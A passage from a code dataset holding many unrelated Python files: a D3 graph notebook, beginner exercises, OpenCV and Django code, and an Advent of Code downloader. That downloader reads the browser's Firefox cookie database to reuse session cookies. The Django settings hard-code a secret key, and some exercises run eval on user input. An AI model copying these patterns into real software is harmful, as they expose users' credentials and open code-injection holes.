str(uuid.uuid4())\n \n # compute size of matrix data set\n dataLength = len(data_set)\n\n # load html template file\n html = Path('d3fdgraph_notebook.html').read_text().replace('%%unique-id%%', uid).replace('%%dataLength%%', str(dataLength-1))\n\n # convert graph nodes, links and list of dates to json, ready for d3\n json_nodes = json.dumps(nodesCalibration(data_set,state_name,image))\n json_links = json.dumps(linksCalibration(data_set))\n json_dates = json.dumps(date_list(data_set))\n \n # convert zoom boolean into json format\n zoomBoolean = json.dumps(zoom)\n \n # convert colour array to json\n colourArray = json.dumps(colour)\n \n # convert coordinates array to json\n coordinates = json.dumps(coordinates)\n \n # Use different adjustable configuration values\n config = {'width': 1000,\n 'height': 600,\n 'noderadius': 10,\n 'linkcharge': -200,\n 'linkdistance': 180,\n 'collisionscale': 4,\n 'linkwidthscale': 4,\n 'ticks': 200,\n 'dataLength':dataLength,\n 'nodes': json_nodes,\n 'links': json_links,\n 'date_list':json_dates,\n 'zoomBoolean': zoomBoolean,\n 'colourArray': colourArray,\n 'coordinates': coordinates}\n\n config.update(kwargs)\n js_code = create_d3_fdgraph(uid, config)\n\n # display html in notebook cell\n IPython.core.display.display_html(IPython.core.display.HTML(html))\n \n # display (run) javascript in notebook cell\n IPython.core.display.display_javascript(IPython.core.display.Javascript(data=js_code))\n pass\n\ndef create_d3_fdgraph(uid, config):\n \"\"\"[summary]\n Parameters\n ----------\n uid : string, required\n [description], identifier of svg element\n config : dict, required\n [description], configuration values for js file\n \n Returns\n -------\n [type]\n [description], replaces keywords of js file\n \n Functions\n --------- \n Replaces keywords of Javascript and CSS files with\n given configuration values.\n \"\"\"\n js_code = Path('d3fdgraph_notebook.js').read_text()\n js_code = js_code.replace('%%unique-id%%', uid)\n for key, value in config.items():\n js_code = js_code.replace(f'%%{key}%%', str(value))\n\n return js_code\n\ndef nodesCalibration(data_set, state_name, image):\n \"\"\"[summary]\n Parameters\n ----------\n data_set : list, required\n state_name : list, optional\n image : list, optional\n \n Returns\n -------\n [type]\n [description], a dictionary of lists of nodes with attributes\n \n Functions\n ---------\n Computes the nodes of the network graph\n \n \"\"\"\n matrixLength = len(data_set[0][1])\n dataLength = len(data_set)\n \n # if state_name is not given, returns a list of alphabets\n if type(state_name) == type(None):\n state_name = string.ascii_uppercase[:matrixLength]\n \n # if image is not given, returns a list of Nones\n if type(image) == type(None):\n image = [None]*matrixLength\n \n nodes = {}\n for i in range(dataLength):\n nodes[i]=[]\n for j in range(matrixLength):\n nodes[i].append({\"id\":state_name[j],\"image\":image[j]})\n return nodes\n\ndef linksCalibration(data_set):\n \"\"\"[summary]\n Parameters\n ----------\n data_set : list, required\n \n Returns\n -------\n [type]\n [description], a dictionary of lists of links with attributes\n \n Functions\n ---------\n Computes the links of the network graph\n \n \"\"\"\n dataLength = len(data_set)\n matrixLength = len(data_set[0][1])\n links = {}\n \n for k in range(dataLength):\n links[k]=[]\n for j in range(matrixLength):\n for i in range(matrixLength):\n links[k].append({\"source\": i,\"target\": j,\"id\": str(i)+str(j),\n \"weight\": data_set[k][1][j][i]})\n return links\n\ndef date_list(data_set):\n \"\"\"[summary]\n Parameters\n ----------\n data_set : list, required\n \n Returns\n -------\n [type]\n [description], a dictionary of lists of links with attributes\n \n Functions\n ---------\n Computes the links of the network graph\n \n \"\"\"\n date_list = []\n dataLength = len(data_set)\n for data in data_set:\n date_list.append(data[0])\n \n return date_list\n","sub_path":"MVVM/Jupyter Notebook/d3fdgraph_notebook.py","file_name":"d3fdgraph_notebook.py","file_ext":"py","file_size_in_byte":5538,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"300820404","text":"# Ex7.4\nn = eval(input('How many elements in your tuple? '))\nlist = []\nfor i in range(0, n-1):\n value = eval(input(\"Append your tuple: \"))\n list.append(value)\ntuple = tuple(list)\nstr = input('Enter the str: ')\nprint(str, ' appears ', tuple.count(str), ' time(s)')\n\n# # Ex7.2\n# list = []\n# stop = 1\n# while stop == 1:\n# value = eval(input(\"Append your list: \"))\n# list.append(value)\n# stop = eval(input(\"Do you want to continue? (1:Yes, 0:No) \"))\n\n# x = eval(input('Enter a number x: '))\n# print('Sum of list: ', sum(list))\n\n# count = list.count(x)\n# if count > 0:\n# print(x, ' appears ', count, ' time')\n# else:\n# print('There is no ', x, ' in the list')\n# # solution 1\n# greater = []\n# for i in list:\n# if x < i:\n# greater.append(i)\n# if len(greater) == 0:\n# print(x, ' is greater than all numbers in the list')\n# else:\n# print(x, ' is smaller than: ', greater)\n# solution 2??????\n# list.sort()\n# if x > max(list):\n# print(x, ' is greater than all numbers in the list')\n# else:\n# for i in range(0, len(list)-1):\n# if x < list[i]:\n# print(x, ' is smaller than: ', list[i, ])\n# else: break\n\n# # Ex7.1\n# list_animals = ['ant', 'bear', 'cat', 'dog','elephant', 'fish', 'goat', 'hippo']\n# print('List of animals: ', list_animals)\n# print('Number of animals: ', len(list_animals))\n# find = input(\"I want to find:\")\n# found = find in list_animals\n# if found:\n# print('There is a ', find, ' in the list')\n# else:\n# print('There is no ', find, ' in the list')\n","sub_path":"Bai_7_List_Tuple_Set_Dictionary.py","file_name":"Bai_7_List_Tuple_Set_Dictionary.py","file_ext":"py","file_size_in_byte":1542,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"556749950","text":"from CRC import *\nimport struct\n\nCOMM=1\nCONFI=2\n \n \nREQT_WEIGHT=1\nREQT_ACCELE=2\nREQT_M_ACCELE=3\nSET_TIME=4\nCONN_REQT=5\n \nSTART_ACCELE_REC=6\nSTOP_ACCELE_REC=7\nSTART_WEIGHT_REC=8\nTRANS=9\nTRANS_ACCEL=10\n\nFIN_WEIGHT_INIT=11\nclass Message:\n def __init__(self,msg=None, com=None,val=None, buf=None):\n print(\"new\")\n if buf!=None:\n self.mssg_type=struct.unpack('i', buf[0:4])[0]\n self.comm_type=struct.unpack('i', buf[4:8])[0]\n self.value=struct.unpack('f', buf[8:12])[0]\n self.CRC=struct.unpack('I', buf[12:16])[0]\n self.buff=buf[0:16]\n elif msg!=None and com!=None and val!=None:\n self.mssg_type=msg\n self.comm_type=com\n self.value=val\n temp=struct.pack(\"i\", msg)+struct.pack(\"i\", com)+struct.pack(\"f\", val)\n self.CRC=getCRC32(temp) & 0xFFFFFFFF\n temp2=struct.pack(\"I\", self.CRC)\n\n self.buff=temp+temp2\n def isOkay(self):\n temp=getCRC32(self.buff[0:12])\n if temp==self.CRC:\n return True\n else:\n return False\n \nclass Message2:\n def __init__(self, mssg_type=None, comm_type=None, value=None, buff=None):\n if buff==None:\n if type(mssg_type)==str and type(comm_type)==str and type(value)==str:\n self.mssg_type=mssg_type\n self.comm_type=comm_type\n self.value=value\n else:\n self.mssg_type=mssg_type\n self.comm_type=comm_type\n self.value=str(value)\n self.buff=self.mssg_type+\" \"+self.comm_type+\" \"+self.value\n else:\n self.buff=buff\n res=self.buff.split(' ')\n self.mssg_type=res[0]\n self.comm_type=res[1]\n self.value=res[2]\n \n \n","sub_path":"Final/RaspberryPi/messageSystem.py","file_name":"messageSystem.py","file_ext":"py","file_size_in_byte":1845,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"510788477","text":"\nimport socket\nimport socks\n\nsocks.set_default_proxy(socks.SOCKS5, \"localhost\",9150)\nsocket.socket = socks.socksocket\nimport urllib.request\nimport sys\nimport os\nimport time\nimport threading\nfrom tkinter import *\nimport tkinter.ttk as ttk\nre=None\nnewsize=0\nnotr=6\npauseint=0\ncomplete=False\npauseflag=False\ndef compl():\n k=0\n for i in range(0,7):\n k=k+totc[i]\n return k\n \ndef guiclt(goturi,gotname):\n def myexit():\n pass\n try:\n root=Tk()\n root.title('downloader')\n #root.protocol(\"WM_DELETE_WINDOW\", myexit)\n lab=Label(root,text=\"Wait...\",fg=\"red\")\n per=Label(root,text=\"Please Wait..\",fg=\"blue\")\n \n pause=Button(root,text=\"PAUSE\")\n \n pb_hd = ttk.Progressbar(root, orient='horizontal', mode='determinate')\n \n pb_hd.pack(expand=True)\n \n pb_hd[\"maximum\"] = 100\n \n pb_hd['value']=0\n \n lab.pack()\n per.pack()\n def pauseplay(event):\n global pauseint,pauseflag\n if pauseint==0:\n pauseflag=True\n pauseint=1\n pause['text']='Resume'\n time.sleep(0.5)\n else:\n pauseflag=False\n pause['text']='Pause'\n pauseint=0\n time.sleep(0.9)\n pause.bind('',pauseplay)\n\n pause.pack()\n def printgui(text,k):\n text=text\n k['text']=text\n #print(text)\n def reqfunc(a,b):\n global re\n re=urllib.request.Request(a)\n class downloadfile:\n def __init__(self,uri):\n self.maxi=13\n i=0\n self.error=False\n self.size=0\n self.filename=''\n self.parts={}\n self.chunk=0\n self.uri=uri\n printgui(\"Connecting..\",lab)\n while i\n#-------------------------------------------------------------------------------\nimport os.path\nfrom fsrStuff.umFuncs import parseDirectDat, RecordGenerator, BBBB2money\nclass Global(object):\n pass\n\ndef main():\n with open(i10Name, 'r') as i10File:\n i10Lines = i10File.readlines()\n i10Lines.pop(0)\n with open(outName, 'w+b') as outFile:\n outFile.write(bytearray(b'\\x00'*90)) #Plan to throw one away\n outFile.write(bytearray(b'\\x00'*90)) #Well, two actually.\n for obj in RecordGenerator(office, \"Diagnosis\"):\n outRec = bytearray(b'\\x00'*90)\n outRec[0] = outRec[-1] = b'\\x01'\n outRec[5:11] = obj.ID.ljust(6)\n outRec[12:52] = obj.Description.ljust(40)\n if obj.DotFormat:\n outRec[53] = b'\\01'\n outRec[54:60] = obj.ICD.ljust(6)\n else:\n outRec[53:60] = obj.ICD.ljust(7)\n outFile.write(outRec)\n for line in i10Lines:\n outRec = bytearray(b'\\x00'*90)\n outRec[0] = outRec[-1] = b'\\x01'\n outRec[5:11] = line[:6]\n outRec[12:52] = line[9:49]\n outRec[53:60] = line[54:61]\n outFile.write(outRec)\n\nif __name__ == '__main__':\n offices = parseDirectDat(\"e:\\\\ultramed\\direct.dat\")\n office = offices['01']\n outName = os.path.join(os.path.expanduser(\"~\"),\"Desktop\",\"01dia.dat\")\n i10Name = os.path.join(os.path.expanduser(\"~\"),\"Desktop\",\"KamICD10.txt\")\n main()\n","sub_path":"writeDiags.py","file_name":"writeDiags.py","file_ext":"py","file_size_in_byte":1719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"271418297","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('content', '0005_editoraction_time'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='userarticle',\n name='status_by',\n field=models.ForeignKey(blank=True, to=settings.AUTH_USER_MODEL, null=True),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='userarticle',\n name='status_comment',\n field=models.TextField(null=True, blank=True),\n preserve_default=True,\n ),\n migrations.AlterField(\n model_name='editoraction',\n name='user',\n field=models.ForeignKey(to=settings.AUTH_USER_MODEL),\n ),\n migrations.AlterField(\n model_name='userarticle',\n name='status',\n field=models.TextField(blank=True, null=True, choices=[(1, b'bask\\xc4\\xb1ya uygun'), (2, b'web i\\xc3\\xa7in uygun'), (3, b'i\\xc3\\xa7erik bak\\xc4\\xb1m\\xc4\\xb1ndan g\\xc3\\xb6zden ge\\xc3\\xa7irilmeli'), (4, b'format bak\\xc4\\xb1m\\xc4\\xb1ndan g\\xc3\\xb6zden ge\\xc3\\xa7irilmeli'), (5, b'uygun de\\xc4\\x9fil')]),\n ),\n ]\n","sub_path":"solfasol/content/migrations/0006_auto_20140820_1149.py","file_name":"0006_auto_20140820_1149.py","file_ext":"py","file_size_in_byte":1312,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"251741246","text":"import cv2\nimport os\nimport numpy as np\nfrom matplotlib import pyplot as plt\nfrom pprint import pprint\n\nfrom templates import get_templates\nfrom image_utils import resize_image, load_test_image, thicken_image\n\n\n\n### TEMPLATE MATCHING ###\ndef template_matching(img, template):\n #if img == None:\n # print('\\nLOADING TEST IMAGE')\n # img = load_test_image()\n\n img = resize_image(img, 0.5)\n template = resize_image(template, 0.5)\n\n #win = cv2.namedWindow('PREVIEW')\n #cv2.imshow('PREVIEW',img)\n #cv2.waitKey(0)\n\n img = thicken_image(img)\n\n templatet = thicken_image(template)\n w, h = templatet.shape[::-1]\n\n #cv2.imshow('PREVIEW',img)\n #cv2.waitKey(0)\n\n #res = cv2.matchTemplate(img,templatet, cv2.TM_SQDIFF_NORMED)\n #res = cv2.matchTemplate(img,templatet, cv2.TM_SQDIFF)\n res = cv2.matchTemplate(img,templatet, cv2.TM_CCOEFF_NORMED)\n #res = cv2.matchTemplate(img,templatet, cv2.TM_CCOEFF)\n #res = cv2.matchTemplate(img,templatet, cv2.TM_CCORR_NORMED)\n #res = cv2.matchTemplate(img,templatet, cv2.TM_CCORR)\n\n threshold = 0.7\n loc = np.where( res >= threshold)\n\n ### OUTPUT IMAGE\n color = cv2.cvtColor(img, cv2.COLOR_GRAY2BGR)\n rects = 0\n for pt in zip(*loc[::-1]):\n cv2.rectangle(color, pt, (pt[0] + w, pt[1] + h), (0,0,255), 2)\n rects +=1\n print('%d templates matched'%rects)\n cv2.imshow('PREVIEW',color)\n cv2.waitKey(0)\n\n return color\n\n\n\ndef test():\n path = '/home/felix/scripts/response/data/source_png/20150519-k/20150519-k-002-000.png'\n template_dir = '/home/felix/scripts/response/data/templates'\n\n #tmplt1 = os.path.join(template_dir, 'box_empty_0.png') #TM_CCOEFF_NORMED 0.7\n #tmplt1 = os.path.join(template_dir, 'box_cross_0.png')\n\n #template_dir = '/home/felix/scripts/response/data/templates/boxcrossed'\n #tmplt1 = os.path.join(template_dir, 'cross_2.jpg')\n tmplt1 = os.path.join(template_dir, 'cross_only_0.png')\n\n\n img = cv2.imread(path, 0)\n template = cv2.imread(tmplt1, 0)\n\n img = template_matching(img, template)\n\n ### close preview when done\n cv2.destroyAllWindows()\n\n cv2.imwrite('color_image.png', img)\n\nif __name__ == '__main__':\n test()\n","sub_path":"feature_detection_box.py","file_name":"feature_detection_box.py","file_ext":"py","file_size_in_byte":2202,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"23218172","text":"import cv2\nfrom threading import Thread\nimport time\nimport numpy as np\nclass find_point:\n def __init__(self):\n self.img=None\n self.kp=None\n self.des=None\n def start(self):\n th=Thread(target=self.find,args=())\n th.start()\n time.sleep(0)\n th.join()\n def find(self):\n while(True):\n detector=cv2.xfeatures2d.SURF_create(400,6,6)\n matcher=cv2.BFMatcher(cv2.NORM_L2)\n self.kp, self.des=detector.detectAndCompute(self.img, None)\n self.key_size()\n break\n\n def set_img(self,im):\n self.img=cv2.imread(im)\n def set_cv_img(self,im):\n self.img=im\n def get_point(self):\n return self.kp, self.des\n def key_size(self):\n kp_=[]\n des_=[]\n kp_size=np.float32([self.kp[i].size for i in range(len(self.kp))])\n\n for i in range(len(self.kp)):\n if self.kp[i].size>20:\n kp_.append(self.kp[i])\n des_.append(self.des[i])\n self.kp=None\n self.kp=kp_\n self.des=None\n self.des=np.float32(des_)\n","sub_path":"final/Find_Keypoint.py","file_name":"Find_Keypoint.py","file_ext":"py","file_size_in_byte":1113,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"636902258","text":"import argparse\nimport os\nimport re\nimport requests\nimport sqlite3\nfrom http.cookiejar import Cookie, CookieJar\n\ndef get_cookies(cj, ff_cookies):\n con = sqlite3.connect(ff_cookies)\n cur = con.cursor()\n cur.execute(\"SELECT host, path, isSecure, expiry, name, value FROM moz_cookies\")\n for item in cur.fetchall():\n c = Cookie(0, item[4], item[5],\n None, False,\n item[0], item[0].startswith('.'), item[0].startswith('.'),\n item[1], False,\n item[2],\n item[3], item[3]==\"\",\n None, None, {})\n #print(c)\n cj.set_cookie(c)\n\nparser = argparse.ArgumentParser()\nparser.add_argument('year', help=\"Year of AOC event for which data should be downloaded, e.g. '2021'\")\nparser.add_argument('day', type=int, help=\"Day of AOC event for which data should be downloaded, e.g. '5'\")\nargs = parser.parse_args()\n\nfilename = f'data{args.day:02}.txt'\nfullpath = os.path.join(f'sol{args.year}', 'data', filename)\nif os.path.exists(fullpath):\n raise ValueError(f'Data for {args.year}/{args.day:02} already exists.')\n\ncj = CookieJar()\nff_cookies = 'C:/Users/sandr/AppData/Roaming/Mozilla/Firefox/Profiles/b7au43qk.default-release/cookies.sqlite'\nget_cookies(cj, ff_cookies)\ns = requests.Session()\ns.cookies = cj\n\nurl = f\"https://adventofcode.com/{args.year}/day/{args.day}/input\"\n\nresp = requests.get(url, cookies=cj)\nwith open(fullpath, 'wb') as output:\n output.write(resp.content)\n","sub_path":"download.py","file_name":"download.py","file_ext":"py","file_size_in_byte":1460,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"480670056","text":"class Memory(object):\n def __init__(self):\n \n self.actions = []\n self.rewards = []\n self.masks = []\n self.values = []\n self.entropies = []\n self.log_probs = []\n \n def push(self, action,reward,mask,value,log_prob,entropy):\n \n self.actions.append(action)\n self.rewards.append(reward)\n self.masks.append(mask)\n self.values.append(value)\n self.log_probs.append(log_prob)\n self.entropies.append(entropy)\n \n def pop_all(self):\n \n actions = self.actions\n rewards = self.rewards\n masks = self.masks\n values = self.values\n log_probs = self.log_probs\n entropies = self.entropies\n \n self.actions,self.rewards,self.masks, self.values,self.log_probs,self.entropies = [], [], [], [], [], []\n \n \n return actions,rewards,masks, values,log_probs,entropies","sub_path":"Deep learning/Project (A2C_SNAKE)/Code/Buffers/memory.py","file_name":"memory.py","file_ext":"py","file_size_in_byte":947,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"16331953","text":"from site_panel.models import *\r\nfrom django.shortcuts import render, HttpResponse ,redirect\r\nfrom .models import *\r\nfrom datetime import datetime\r\n\r\ndef Index(request):\r\n\tplace_count = Place.objects.all().count()\r\n\tferdos_deceased_count = License.objects.filter(move_status='FERDOS-REZA').count()\r\n\tout_deceased_count = License.objects.filter(move_status='SEND-OUT').count()\r\n\tusers_count = MyUser.objects.all().count()\r\n\tnews = New.objects.all().order_by('-created')[:3]\r\n\tahadith = Hadith.objects.all()\r\n\tsliders = Slider.objects.filter(status='Active')\r\n\tblack = False\r\n\tif sliders.count() == 0:\r\n\t\tblack = True\r\n\tcontext = {\r\n\t\t'index':True,\r\n\t\t'users_count':users_count,\r\n\t\t'ferdos_deceased_count':ferdos_deceased_count,\r\n\t\t'out_deceased_count':out_deceased_count,\r\n\t\t'black':black,\r\n\t\t'sliders': sliders,\r\n\t\t'ahadith': ahadith,\r\n\t\t'news': news,\r\n\t\t'place_count': place_count,\r\n\t}\r\n\treturn render(request, 'main-site/index.html', context)\r\n\r\ndef About_Us(request):\r\n\tcontext = {\r\n\t\t'about_us':True,\r\n\t}\r\n\treturn render(request, 'main-site/main-site/about.html', context)\r\n\r\n\r\ndef Memorial(request):\r\n\tmarasems = Marasem.objects.all()\r\n\tcontext = {\r\n\t\t'marasems': marasems,\r\n\t\t'black': True\r\n\t}\r\n\treturn render(request, 'main-site/main-site/memorial.html', context)\r\n\r\ndef Search(request):\r\n\tcontext = {\r\n\t\t'search':True,\r\n\r\n\t}\r\n\treturn render(request, 'main-site/main-site/search.html', context)\r\n\r\n\r\ndef All_News(request):\r\n\tnews = New.objects.filter(status='Public')\r\n\tcontext = {\r\n\t\t'news':news,\r\n\t\t'all_news':True\r\n\t}\r\n\treturn render(request, 'main-site/main-site/all_news.html', context)\r\n\r\ndef Contact(request):\r\n\r\n\tif request.method == 'POST':\r\n\t\tfirst_name = request.POST['fname']\r\n\t\tlast_name = request.POST['lname']\r\n\t\temail = request.POST['email']\r\n\t\tsubject = request.POST['subject']\r\n\t\tmessage = request.POST['message']\r\n\t\tif email != '' and first_name != '' and last_name != '' and subject != '' and message != '':\r\n\t\t\ttry:\r\n\t\t\t\tsend_message = Message.objects.get(email=email,status='UnRead')\r\n\t\t\t\tcontext = {\r\n\t\t\t\t\t'error':True,\r\n\t\t\t\t\t'message':'لطفا تا خوانده شدن درخواست قبلی خود منتظر بمانید. با تشکر از انتظار شما'\r\n\t\t\t\t}\r\n\t\t\t\treturn render(request, 'main-site/main-site/contact.html', context)\r\n\t\t\texcept:\r\n\t\t\t\tsend_message = Message.objects.create(first_name=first_name,last_name=last_name,email=email,subject=subject,content=message)\r\n\t\t\t\tcontext = {\r\n\t\t\t\t\t'success': True,\r\n\t\t\t\t\t'message': 'ارسال درخواست با موفقیت ارسال شد.',\r\n\t\t\t\t}\r\n\t\t\t\treturn render(request, 'main-site/main-site/contact.html', context)\r\n\t\telse:\r\n\t\t\tcontext = {\r\n\t\t\t\t'error': True,\r\n\t\t\t\t'message': 'لطفا همه اطلاعات خواسته شده را تکمیل نمایید.',\r\n\t\t\t}\r\n\t\t\treturn render(request, 'main-site/main-site/contact.html', context)\r\n\r\n\tcontext = {\r\n\t\t'warning':True,\r\n\t\t'message':'اطلاعات خود را به دقت وارد نمایید.'\r\n\t}\r\n\treturn render(request, 'main-site/main-site/contact.html', context)","sub_path":"main/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3028,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"98810955","text":"from copy import deepcopy\nimport os\n\nPROJECT_PATH = os.path.abspath(os.path.join(os.path.dirname(__file__), os.pardir))\nPROJECT_ROOT = os.path.abspath(os.path.join(PROJECT_PATH, os.pardir))\n\nDEBUG = True\nTEMPLATE_DEBUG = DEBUG\n\nADMINS = []\n_admin_names = os.getenv('DJANGO_ADMIN_NAMES', \"\")\n_admin_emails = os.getenv('DJANGO_ADMIN_EMAILS', \"\")\nif (len(_admin_names) > 0 and len(_admin_emails) > 0):\n ADMINS = zip(_admin_names.split(\"|\"), _admin_emails.split(\"|\"))\n\nMANAGERS = ADMINS\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.sqlite3',\n 'NAME': os.path.join(PROJECT_ROOT, 'sqlite.db'),\n 'USER': '',\n 'PASSWORD': '',\n 'HOST': '',\n 'PORT': '',\n }\n}\n\nTIME_ZONE = 'America/New_York'\n\n# 2-letter country codes for countries whose time zones we should offer\n# as choices for an event's time zone\nTIME_ZONE_COUNTRIES = ['us', 'fr', 'gb']\n\nLANGUAGE_CODE = 'en-us'\nSITE_ID = os.environ.get('DJANGO_SITE_ID', 1)\n\nUSE_I18N = True\nUSE_L10N = True\nUSE_TZ = True\n\nMEDIA_ROOT = os.path.join(PROJECT_ROOT, 'public', 'media')\nMEDIA_URL = '/media/'\n\nSTATIC_ROOT = os.path.join(PROJECT_ROOT, 'public', 'static')\nSTATIC_URL = '/static/'\n\n# Additional locations of static files\nSTATICFILES_DIRS = (\n os.path.join(PROJECT_ROOT, 'static'),\n)\n\nSTATICFILES_FINDERS = (\n 'django.contrib.staticfiles.finders.FileSystemFinder',\n 'django.contrib.staticfiles.finders.AppDirectoriesFinder',\n 'compressor.finders.CompressorFinder',\n)\n\n# Make this unique, and don't share it with anybody.\nSECRET_KEY = \"a-wv-x8(e&z!3kry8zq2-apy(u8%6m7k2b80%h8wb57zmo&6v0\"\n\nTEMPLATE_CONTEXT_PROCESSORS = (\n 'django.contrib.auth.context_processors.auth',\n 'django.contrib.messages.context_processors.messages',\n 'django.core.context_processors.debug',\n 'django.core.context_processors.media',\n 'django.core.context_processors.request',\n 'django.core.context_processors.i18n',\n 'django.core.context_processors.static',\n 'django.core.context_processors.tz',\n)\n\nMIDDLEWARE_CLASSES = (\n 'django.middleware.common.CommonMiddleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n)\n\nROOT_URLCONF = 'django_project.urls'\n\nWSGI_APPLICATION = 'django_project.wsgi.application'\n\nTEMPLATE_DIRS = (\n os.path.join(PROJECT_ROOT, 'templates'),\n)\n\nFIXTURE_DIRS = (\n os.path.join(PROJECT_ROOT, 'fixtures'),\n)\n\nINSTALLED_APPS = (\n # Django apps\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.sites',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n 'grappelli',\n 'django.contrib.admin',\n 'django.contrib.humanize',\n 'django.contrib.sitemaps',\n # External apps\n 'compressor',\n 'selectable',\n 'bootstrap3',\n 'ckeditor',\n 'rest_framework',\n 'django_extensions',\n # Custom apps\n 'utils',\n 'cards',\n 'myuser'\n)\n\nAUTH_USER_MODEL = 'auth.User'\n\n# email settings\nEMAIL_BACKEND = 'django.core.mail.backends.smtp.EmailBackend'\nEMAIL_SUBJECT_PREFIX = \"[loc] \"\nDEFAULT_FROM_EMAIL = \"webmaster@loc.com\"\n\n# A sample logging configuration. The only tangible logging\n# performed by this configuration is to send an email to\n# the site admins on every HTTP 500 error when DEBUG=False.\n# See http://docs.djangoproject.com/en/dev/topics/logging for\n# more details on how to customize your logging configuration.\nLOGGING = {\n 'version': 1,\n 'disable_existing_loggers': False,\n 'filters': {\n 'require_debug_false': {\n '()': 'django.utils.log.RequireDebugFalse'\n }\n },\n 'formatters': {\n 'basic': {\n 'format': '%(asctime)s %(name)-20s %(levelname)-8s %(message)s',\n },\n },\n 'handlers': {\n 'mail_admins': {\n 'level': 'ERROR',\n 'filters': ['require_debug_false'],\n 'class': 'django.utils.log.AdminEmailHandler'\n },\n 'console': {\n 'level': 'DEBUG',\n 'class': 'logging.StreamHandler',\n 'formatter': 'basic',\n },\n 'file': {\n 'level': 'DEBUG',\n 'class': 'logging.handlers.RotatingFileHandler',\n 'formatter': 'basic',\n 'filename': os.path.join(PROJECT_ROOT, 'loc.log'),\n 'maxBytes': 10 * 1024 * 1024, # 10 MB\n 'backupCount': 10,\n },\n },\n 'loggers': {\n 'django.request': {\n 'handlers': ['mail_admins'],\n 'level': 'ERROR',\n 'propagate': True,\n },\n '': {\n 'handlers': ['file'],\n 'level': 'DEBUG',\n },\n }\n}\n\nTEST_RUNNER = 'django.test.runner.DiscoverRunner'\n\nLOGIN_URL = 'login'\nLOGOUT_URL = 'logout'\nLOGIN_REDIRECT_URL = 'home'\n\n# Application settings\nCOMPRESS_PRECOMPILERS = (\n ('text/less', 'lessc {infile} {outfile}'),\n)\n\nSELECTABLE_MAX_LIMIT = 30\n\nCKEDITOR_UPLOAD_PATH = \"uploads/\"\nCKEDITOR_IMAGE_BACKEND = \"pillow\"\nCKEDITOR_JQUERY_URL = '//ajax.googleapis.com/ajax/libs/jquery/2.1.1/jquery.min.js'\nCKEDITOR_RESTRICT_BY_USER = True\nCKEDITOR_CONFIGS = {\n 'base': {\n 'skin': 'moono',\n 'toolbar_Basic': [\n ['Source', '-', 'Bold', 'Italic']\n ],\n 'toolbar_Full': [\n ['Styles', 'Format', 'Bold', 'Italic', 'Undo', 'Redo'],\n ['Image', 'Table', 'NumberedList', 'BulletedList', 'Link', 'HorizontalRule'],\n ],\n 'toolbar': 'Full',\n 'height': 150,\n 'width': 1000,\n 'filebrowserWindowWidth': 940,\n 'filebrowserWindowHeight': 725,\n }\n}\n\nCKEDITOR_CONFIGS['narrow'] = deepcopy(CKEDITOR_CONFIGS['base'])\nCKEDITOR_CONFIGS['narrow']['width'] = 400\n\nGRAPPELLI_ADMIN_TITLE = \"Level of Concern\"\n\nENCRYPTED_FIELD_KEYS_DIR = os.environ.get('KEYCZAR_DIR')\n","sub_path":"project/django_project/settings/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":5974,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"159061928","text":"import requests\nimport json\nfrom collections import defaultdict\nimport pymongo\nimport cassiopeia as cass\nfrom DBKEYS import database_client\nfrom RIOTAPIKEY import key\n\nRIOTAPIKEY = key\n\n# Database info\nmongoclient = pymongo.MongoClient(database_client)\ndb = mongoclient.frequentoflegends\nwin_champs_col = db.winning_champs\nloss_champs_col = db.losing_champs\nwin_champs_class_col = db.winning_champs_classifier\nloss_champs_class_col = db.losing_champs_classifier\n\n# Cassioepeia info\nRIOTAPIKEY = key\ncass.set_riot_api_key(RIOTAPIKEY)\ncass.set_default_region(\"NA\")\n\n\n# No. of champions currently in game\nnumber_of_champions = 146 #len(cass.get_champions())\n\n# Transaction table of all champions by matches played. The format of the table is as follows:\n# Champ1 | Champ2 | Champ3| ...\n# Match1 1 0 0\n# Match2 0 1 1\n# Match3 1 1 1\n#\n# The 1 represents a match where the champion was played and won\n\nwinning_champs_transaction_table = []\nlosing_champs_transaction_table = []\n\n# This stores the equivalent ID's of champions put into the transaction table. While there are 140+ champions in the game, some have ID's stretching as far as the 300's. This sytem allows us to instead create our own ID's in place\n\ntransaction_table_ids_lookup = list()\n\n# DATABASE RETRIEVALS\nwinning_champs = []\nfor document in win_champs_col.find(): # Can use .limit(n) to reduce for testing\n winning_champs.append(document)\n\nlosing_champs = []\nfor document in loss_champs_col.find(): # Can use .limit(n) to reduce for testing\n losing_champs.append(document)\n\n# TRANSACTION TABLE\nfor match in winning_champs:\n win_transaction = [0] * number_of_champions\n\n for champ in match.get('winning_champions'):\n if champ not in transaction_table_ids_lookup:\n transaction_table_ids_lookup.append(champ)\n\n champ_index = transaction_table_ids_lookup.index(champ)\n 